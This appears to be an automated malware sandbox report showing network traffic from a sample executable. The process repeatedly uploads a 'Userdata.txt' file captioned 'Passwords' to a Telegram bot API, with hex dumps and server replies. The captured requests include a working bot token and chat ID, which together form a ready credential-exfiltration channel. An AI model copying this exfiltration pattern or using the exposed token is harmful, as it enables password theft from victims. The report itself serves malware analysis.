                                                                                                              2025-01-10 22:39:21 UTC1090OUTData Raw: 2d 2d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 38 64 64 33 32 39 39 30 34 32 32 33 31 62 63 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 55 73 65 72 64 61 74 61 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 0d 0a 0d 0a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 0d 0a 2a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20
                                                                                                              Data Ascii: --===============8dd3299042231bcContent-Disposition: form-data; name="document"; filename="Userdata.txt"Content-Type: application/x-ms-dos-executable************************************************************
                                                                                                              2025-01-10 22:39:21 UTC388INHTTP/1.1 200 OK
                                                                                                              Server: nginx/1.18.0
                                                                                                              Date: Fri, 10 Jan 2025 22:39:21 GMT
                                                                                                              Content-Type: application/json
                                                                                                              Content-Length: 543
                                                                                                              Connection: close
                                                                                                              Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                                                              Access-Control-Allow-Origin: *
                                                                                                              Access-Control-Allow-Methods: GET, POST, OPTIONS
                                                                                                              Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                                                                                              2025-01-10 22:39:21 UTC543INData Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 34 33 36 38 32 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 37 31 36 32 39 31 35 38 34 37 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 47 54 5a 53 55 52 45 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 47 54 5a 53 55 52 45 5f 62 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 37 33 38 32 38 30 39 30 39 35 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 47 68 6f 73 74 74 74 74 74 74 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 67 68 6f 6f 7a 7a 7a 7a 74 22 2c 22 74 79 70 65 22 3a 22 70 72 69 76 61 74 65 22 7d 2c 22 64 61 74 65 22 3a 31 37 33 36 35 34 38 37 36 31 2c 22 64 6f 63 75 6d 65 6e 74 22 3a 7b 22 66 69 6c 65 5f 6e
                                                                                                              Data Ascii: {"ok":true,"result":{"message_id":43682,"from":{"id":7162915847,"is_bot":true,"first_name":"GTZSURE","username":"GTZSURE_bot"},"chat":{"id":7382809095,"first_name":"Ghostttttt","username":"ghoozzzzt","type":"private"},"date":1736548761,"document":{"file_n


                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                              16192.168.2.849983149.154.167.2204435296C:\Users\user\Desktop\czHx16QwGQ.exe
                                                                                                              TimestampBytes transferredDirectionData
                                                                                                              2025-01-10 22:39:23 UTC272OUTPOST /bot7162915847:AAFcWinWendSJrYL4eRL1FJDDjF3FOU7gZc/sendDocument?chat_id=7382809095&caption=user%20/%20Passwords%20/%208.46.123.189 HTTP/1.1
                                                                                                              Content-Type: multipart/form-data; boundary================8dd32ad3d6845d9
                                                                                                              Host: api.telegram.org
                                                                                                              Content-Length: 1090
                                                                                                              2025-01-10 22:39:23 UTC1090OUTData Raw: 2d 2d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 38 64 64 33 32 61 64 33 64 36 38 34 35 64 39 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 55 73 65 72 64 61 74 61 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 0d 0a 0d 0a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 0d 0a 2a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20
                                                                                                              Data Ascii: --===============8dd32ad3d6845d9Content-Disposition: form-data; name="document"; filename="Userdata.txt"Content-Type: application/x-ms-dos-executable************************************************************
                                                                                                              2025-01-10 22:39:23 UTC388INHTTP/1.1 200 OK
                                                                                                              Server: nginx/1.18.0
                                                                                                              Date: Fri, 10 Jan 2025 22:39:23 GMT
                                                                                                              Content-Type: application/json
                                                                                                              Content-Length: 543
                                                                                                              Connection: close
                                                                                                              Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                                                              Access-Control-Allow-Origin: *
                                                                                                              Access-Control-Allow-Methods: GET, POST, OPTIONS
                                                                                                              Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                                                                                              2025-01-10 22:39:23 UTC543INData Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 34 33 36 38 33 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 37 31 36 32 39 31 35 38 34 37 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 47 54 5a 53 55 52 45 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 47 54 5a 53 55 52 45 5f 62 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 37 33 38 32 38 30 39 30 39 35 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 47 68 6f 73 74 74 74 74 74 74 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 67 68 6f 6f 7a 7a 7a 7a 74 22 2c 22 74 79 70 65 22 3a 22 70 72 69 76 61 74 65 22 7d 2c 22 64 61 74 65 22 3a 31 37 33 36 35 34 38 37 36 33 2c 22 64 6f 63 75 6d 65 6e 74 22 3a 7b 22 66 69 6c 65 5f 6e
                                                                                                              Data Ascii: {"ok":true,"result":{"message_id":43683,"from":{"id":7162915847,"is_bot":true,"first_name":"GTZSURE","username":"GTZSURE_bot"},"chat":{"id":7382809095,"first_name":"Ghostttttt","username":"ghoozzzzt","type":"private"},"date":1736548763,"document":{"file_n


                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                              17192.168.2.849995149.154.167.2204435296C:\Users\user\Desktop\czHx16QwGQ.exe
                                                                                                              TimestampBytes transferredDirectionData
                                                                                                              2025-01-10 22:39:24 UTC272OUTPOST /bot7162915847:AAFcWinWendSJrYL4eRL1FJDDjF3FOU7gZc/sendDocument?chat_id=7382809095&caption=user%20/%20Passwords%20/%208.46.123.189 HTTP/1.1
                                                                                                              Content-Type: multipart/form-data; boundary================8dd32beb897ea19
                                                                                                              Host: api.telegram.org
                                                                                                              Content-Length: 1090
                                                                                                              2025-01-10 22:39:24 UTC1090OUTData Raw: 2d 2d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 38 64 64 33 32 62 65 62 38 39 37 65 61 31 39 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 55 73 65 72 64 61 74 61 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 0d 0a 0d 0a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 0d 0a 2a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20
                                                                                                              Data Ascii: --===============8dd32beb897ea19Content-Disposition: form-data; name="document"; filename="Userdata.txt"Content-Type: application/x-ms-dos-executable************************************************************
                                                                                                              2025-01-10 22:39:25 UTC388INHTTP/1.1 200 OK
                                                                                                              Server: nginx/1.18.0
                                                                                                              Date: Fri, 10 Jan 2025 22:39:24 GMT
                                                                                                              Content-Type: application/json
                                                                                                              Content-Length: 543
                                                                                                              Connection: close
                                                                                                              Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                                                              Access-Control-Allow-Origin: *
                                                                                                              Access-Control-Allow-Methods: GET, POST, OPTIONS
                                                                                                              Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                                                                                              2025-01-10 22:39:25 UTC543INData Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 34 33 36 38 34 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 37 31 36 32 39 31 35 38 34 37 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 47 54 5a 53 55 52 45 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 47 54 5a 53 55 52 45 5f 62 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 37 33 38 32 38 30 39 30 39 35 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 47 68 6f 73 74 74 74 74 74 74 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 67 68 6f 6f 7a 7a 7a 7a 74 22 2c 22 74 79 70 65 22 3a 22 70 72 69 76 61 74 65 22 7d 2c 22 64 61 74 65 22 3a 31 37 33 36 35 34 38 37 36 34 2c 22 64 6f 63 75 6d 65 6e 74 22 3a 7b 22 66 69 6c 65 5f 6e
                                                                                                              Data Ascii: {"ok":true,"result":{"message_id":43684,"from":{"id":7162915847,"is_bot":true,"first_name":"GTZSURE","username":"GTZSURE_bot"},"chat":{"id":7382809095,"first_name":"Ghostttttt","username":"ghoozzzzt","type":"private"},"date":1736548764,"document":{"file_n


                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                              18192.168.2.850007149.154.167.2204435296C:\Users\user\Desktop\czHx16QwGQ.exe
                                                                                                              TimestampBytes transferredDirectionData
                                                                                                              2025-01-10 22:39:26 UTC272OUTPOST /bot7162915847:AAFcWinWendSJrYL4eRL1FJDDjF3FOU7gZc/sendDocument?chat_id=7382809095&caption=user%20/%20Passwords%20/%208.46.123.189 HTTP/1.1
                                                                                                              Content-Type: multipart/form-data; boundary================8dd32d2d677c1e5
                                                                                                              Host: api.telegram.org
                                                                                                              Content-Length: 1090
                                                                                                              2025-01-10 22:39:26 UTC1090OUTData Raw: 2d 2d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 38 64 64 33 32 64 32 64 36 37 37 63 31 65 35 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 55 73 65 72 64 61 74 61 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 0d 0a 0d 0a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 0d 0a 2a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20
                                                                                                              Data Ascii: --===============8dd32d2d677c1e5Content-Disposition: form-data; name="document"; filename="Userdata.txt"Content-Type: application/x-ms-dos-executable************************************************************
                                                                                                              2025-01-10 22:39:26 UTC388INHTTP/1.1 200 OK
                                                                                                              Server: nginx/1.18.0
                                                                                                              Date: Fri, 10 Jan 2025 22:39:26 GMT
                                                                                                              Content-Type: application/json
                                                                                                              Content-Length: 543
                                                                                                              Connection: close
                                                                                                              Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                                                              Access-Control-Allow-Origin: *
                                                                                                              Access-Control-Allow-Methods: GET, POST, OPTIONS
                                                                                                              Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                                                                                              2025-01-10 22:39:26 UTC543INData Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 34 33 36 38 35 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 37 31 36 32 39 31 35 38 34 37 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 47 54 5a 53 55 52 45 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 47 54 5a 53 55 52 45 5f 62 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 37 33 38 32 38 30 39 30 39 35 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 47 68 6f 73 74 74 74 74 74 74 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 67 68 6f 6f 7a 7a 7a 7a 74 22 2c 22 74 79 70 65 22 3a 22 70 72 69 76 61 74 65 22 7d 2c 22 64 61 74 65 22 3a 31 37 33 36 35 34 38 37 36 36 2c 22 64 6f 63 75 6d 65 6e 74 22 3a 7b 22 66 69 6c 65 5f 6e
                                                                                                              Data Ascii: {"ok":true,"result":{"message_id":43685,"from":{"id":7162915847,"is_bot":true,"first_name":"GTZSURE","username":"GTZSURE_bot"},"chat":{"id":7382809095,"first_name":"Ghostttttt","username":"ghoozzzzt","type":"private"},"date":1736548766,"document":{"file_n


                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                              19192.168.2.850010149.154.167.2204435296C:\Users\user\Desktop\czHx16QwGQ.exe
                                                                                                              TimestampBytes transferredDirectionData
                                                                                                              2025-01-10 22:39:27 UTC296OUTPOST /bot7162915847:AAFcWinWendSJrYL4eRL1FJDDjF3FOU7gZc/sendDocument?chat_id=7382809095&caption=user%20/%20Passwords%20/%208.46.123.189 HTTP/1.1
                                                                                                              Content-Type: multipart/form-data; boundary================8dd32e58fd9cbdf
                                                                                                              Host: api.telegram.org
                                                                                                              Content-Length: 1090
                                                                                                              Connection: Keep-Alive
                                                                                                              2025-01-10 22:39:27 UTC1090OUTData Raw: 2d 2d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 38 64 64 33 32 65 35 38 66 64 39 63 62 64 66 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 55 73 65 72 64 61 74 61 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 0d 0a 0d 0a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 0d 0a 2a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20
                                                                                                              Data Ascii: --===============8dd32e58fd9cbdfContent-Disposition: form-data; name="document"; filename="Userdata.txt"Content-Type: application/x-ms-dos-executable************************************************************
                                                                                                              2025-01-10 22:39:28 UTC388INHTTP/1.1 200 OK
                                                                                                              Server: nginx/1.18.0
                                                                                                              Date: Fri, 10 Jan 2025 22:39:28 GMT
                                                                                                              Content-Type: application/json
                                                                                                              Content-Length: 543
                                                                                                              Connection: close
                                                                                                              Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                                                              Access-Control-Allow-Origin: *
                                                                                                              Access-Control-Allow-Methods: GET, POST, OPTIONS
                                                                                                              Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                                                                                              2025-01-10 22:39:28 UTC543INData Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 34 33 36 38 36 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 37 31 36 32 39 31 35 38 34 37 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 47 54 5a 53 55 52 45 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 47 54 5a 53 55 52 45 5f 62 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 37 33 38 32 38 30 39 30 39 35 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 47 68 6f 73 74 74 74 74 74 74 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 67 68 6f 6f 7a 7a 7a 7a 74 22 2c 22 74 79 70 65 22 3a 22 70 72 69 76 61 74 65 22 7d 2c 22 64 61 74 65 22 3a 31 37 33 36 35 34 38 37 36 38 2c 22 64 6f 63 75 6d 65 6e 74 22 3a 7b 22 66 69 6c 65 5f 6e
                                                                                                              Data Ascii: {"ok":true,"result":{"message_id":43686,"from":{"id":7162915847,"is_bot":true,"first_name":"GTZSURE","username":"GTZSURE_bot"},"chat":{"id":7382809095,"first_name":"Ghostttttt","username":"ghoozzzzt","type":"private"},"date":1736548768,"document":{"file_n


                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                              20192.168.2.850012149.154.167.2204435296C:\Users\user\Desktop\czHx16QwGQ.exe
                                                                                                              TimestampBytes transferredDirectionData
                                                                                                              2025-01-10 22:39:29 UTC296OUTPOST /bot7162915847:AAFcWinWendSJrYL4eRL1FJDDjF3FOU7gZc/sendDocument?chat_id=7382809095&caption=user%20/%20Passwords%20/%208.46.123.189 HTTP/1.1
                                                                                                              Content-Type: multipart/form-data; boundary================8dd32f83c6c0893
                                                                                                              Host: api.telegram.org
                                                                                                              Content-Length: 1090
                                                                                                              Connection: Keep-Alive
                                                                                                              2025-01-10 22:39:29 UTC1090OUTData Raw: 2d 2d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 38 64 64 33 32 66 38 33 63 36 63 30 38 39 33 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 55 73 65 72 64 61 74 61 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 0d 0a 0d 0a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 0d 0a 2a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20
                                                                                                              Data Ascii: --===============8dd32f83c6c0893Content-Disposition: form-data; name="document"; filename="Userdata.txt"Content-Type: application/x-ms-dos-executable************************************************************
                                                                                                              2025-01-10 22:39:29 UTC388INHTTP/1.1 200 OK
                                                                                                              Server: nginx/1.18.0
                                                                                                              Date: Fri, 10 Jan 2025 22:39:29 GMT
                                                                                                              Content-Type: application/json
                                                                                                              Content-Length: 543
                                                                                                              Connection: close
                                                                                                              Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                                                              Access-Control-Allow-Origin: *
                                                                                                              Access-Control-Allow-Methods: GET, POST, OPTIONS
                                                                                                              Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                                                                                              2025-01-10 22:39:29 UTC543INData Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 34 33 36 38 37 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 37 31 36 32 39 31 35 38 34 37 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 47 54 5a 53 55 52 45 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 47 54 5a 53 55 52 45 5f 62 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 37 33 38 32 38 30 39 30 39 35 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 47 68 6f 73 74 74 74 74 74 74 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 67 68 6f 6f 7a 7a 7a 7a 74 22 2c 22 74 79 70 65 22 3a 22 70 72 69 76 61 74 65 22 7d 2c 22 64 61 74 65 22 3a 31 37 33 36 35 34 38 37 36 39 2c 22 64 6f 63 75 6d 65 6e 74 22 3a 7b 22 66 69 6c 65 5f 6e
                                                                                                              Data Ascii: {"ok":true,"result":{"message_id":43687,"from":{"id":7162915847,"is_bot":true,"first_name":"GTZSURE","username":"GTZSURE_bot"},"chat":{"id":7382809095,"first_name":"Ghostttttt","username":"ghoozzzzt","type":"private"},"date":1736548769,"document":{"file_n


                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                              21192.168.2.850014149.154.167.2204435296C:\Users\user\Desktop\czHx16QwGQ.exe
                                                                                                              TimestampBytes transferredDirectionData
                                                                                                              2025-01-10 22:39:30 UTC296OUTPOST /bot7162915847:AAFcWinWendSJrYL4eRL1FJDDjF3FOU7gZc/sendDocument?chat_id=7382809095&caption=user%20/%20Passwords%20/%208.46.123.189 HTTP/1.1
                                                                                                              Content-Type: multipart/form-data; boundary================8dd330adc3c2a0c
                                                                                                              Host: api.telegram.org
                                                                                                              Content-Length: 1090
                                                                                                              Connection: Keep-Alive
                                                                                                              2025-01-10 22:39:30 UTC1090OUTData Raw: 2d 2d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 38 64 64 33 33 30 61 64 63 33 63 32 61 30 63 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 55 73 65 72 64 61 74 61 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 0d 0a 0d 0a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 0d 0a 2a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20
                                                                                                              Data Ascii: --===============8dd330adc3c2a0cContent-Disposition: form-data; name="document"; filename="Userdata.txt"Content-Type: application/x-ms-dos-executable************************************************************
                                                                                                              2025-01-10 22:39:31 UTC388INHTTP/1.1 200 OK
                                                                                                              Server: nginx/1.18.0
                                                                                                              Date: Fri, 10 Jan 2025 22:39:31 GMT
                                                                                                              Content-Type: application/json
                                                                                                              Content-Length: 543
                                                                                                              Connection: close
                                                                                                              Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                                                              Access-Control-Allow-Origin: *
                                                                                                              Access-Control-Allow-Methods: GET, POST, OPTIONS
                                                                                                              Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                                                                                              2025-01-10 22:39:31 UTC543INData Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 34 33 36 38 38 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 37 31 36 32 39 31 35 38 34 37 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 47 54 5a 53 55 52 45 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 47 54 5a 53 55 52 45 5f 62 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 37 33 38 32 38 30 39 30 39 35 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 47 68 6f 73 74 74 74 74 74 74 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 67 68 6f 6f 7a 7a 7a 7a 74 22 2c 22 74 79 70 65 22 3a 22 70 72 69 76 61 74 65 22 7d 2c 22 64 61 74 65 22 3a 31 37 33 36 35 34 38 37 37 31 2c 22 64 6f 63 75 6d 65 6e 74 22 3a 7b 22 66 69 6c 65 5f 6e
                                                                                                              Data Ascii: {"ok":true,"result":{"message_id":43688,"from":{"id":7162915847,"is_bot":true,"first_name":"GTZSURE","username":"GTZSURE_bot"},"chat":{"id":7382809095,"first_name":"Ghostttttt","username":"ghoozzzzt","type":"private"},"date":1736548771,"document":{"file_n


                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                              22192.168.2.850016149.154.167.2204435296C:\Users\user\Desktop\czHx16QwGQ.exe
                                                                                                              TimestampBytes transferredDirectionData
                                                                                                              2025-01-10 22:39:32 UTC296OUTPOST /bot7162915847:AAFcWinWendSJrYL4eRL1FJDDjF3FOU7gZc/sendDocument?chat_id=7382809095&caption=user%20/%20Passwords%20/%208.46.123.189 HTTP/1.1
                                                                                                              Content-Type: multipart/form-data; boundary================8dd331d6f3d349f
                                                                                                              Host: api.telegram.org
                                                                                                              Content-Length: 1090
                                                                                                              Connection: Keep-Alive
